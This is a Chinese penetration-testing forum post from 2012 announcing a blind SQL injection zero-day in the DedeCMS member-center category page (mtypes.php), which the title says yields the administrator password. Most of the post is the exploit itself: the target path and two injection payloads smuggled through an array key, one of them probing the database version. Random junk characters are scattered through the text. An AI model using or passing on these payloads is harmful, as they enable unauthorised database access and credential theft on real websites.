中国网络渗透测试联盟

标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页]

作者: admin    时间: 2012-12-20 08:08
标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
! R1 J. A1 W$ q$ a/ I1 q  {
- k4 o; }; @; d( r
" n4 y" B* Q7 i. h0 K8 l/ }发生在数组key里的注射漏洞,有点意思.- c4 r& J" F4 G' z
( T7 G% m$ K) s5 H: a3 g6 k8 w
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
) I  [2 d# X7 |$ ?$ g" g2 t4 E$ h 1 G% f0 X* |% r: o
http://www.xxx.com /dede/member/mtypes.php?dopost=save
1 O! Z+ {  q; A* F4 v$ L& A$ z
/ @# `$ J' m: c* \3 fexploit:
9 C* W/ I4 y3 g; c6 Ymtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
2 N3 \6 R9 w# x6 L9 emtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r" T5 Q$ \: I) r* X& M3 ?





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2